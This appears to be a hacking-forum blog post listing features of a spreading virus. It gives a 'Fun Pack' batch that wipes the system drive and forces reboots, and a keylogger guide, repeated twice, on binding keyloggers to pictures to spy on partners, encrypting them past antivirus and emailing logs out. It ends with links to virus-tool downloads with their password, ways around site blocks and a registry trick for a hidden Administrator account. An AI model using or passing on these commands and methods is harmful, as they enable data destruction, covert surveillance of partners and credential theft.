- Overwrites files
- Adds/Changes user root:pwd
- Spreads through mIRC [Script.ini], LAN folders, KaZaa Folder, Warez P2P
- Enable DCOM
- Random Virii dropping
- Drop/Changes IE Startpage [use fire fox and no problems with the start page]
Fun Pack
Batch too long click to read (Click to Hide)
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
shutdown -r -f -t 00
Keyloggers:
Sangederomin:
Click to read (Click to Hide)
this is my thread about keyloggers i notice alot of newcomers repeatedly asking about them so here we go...the basics
the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....
Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins
Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING
anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your victim. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.
Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers
the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....
Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins
Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING
anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your victim. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.
Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers
I think all of you know what Viruses mean.
Download some Virus Tools on :
http://www.to0l-base.de/index.php?dir=SysFucker%2F
and search for more on
http://www.to0l-base.de/
The password for all downloaded files are :
To0l-base
Restricted website access:
There are a lot of ways but here are some good ones:
http://www.vtunnel.com
This will go to any website you want
Start>run>ping http://www.url.com
Take the ip and paste it in the url of the browser there you have it:)
Administrator priviliges:
Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.
This article is taken from hackforum.net
0 comments:
Post a Comment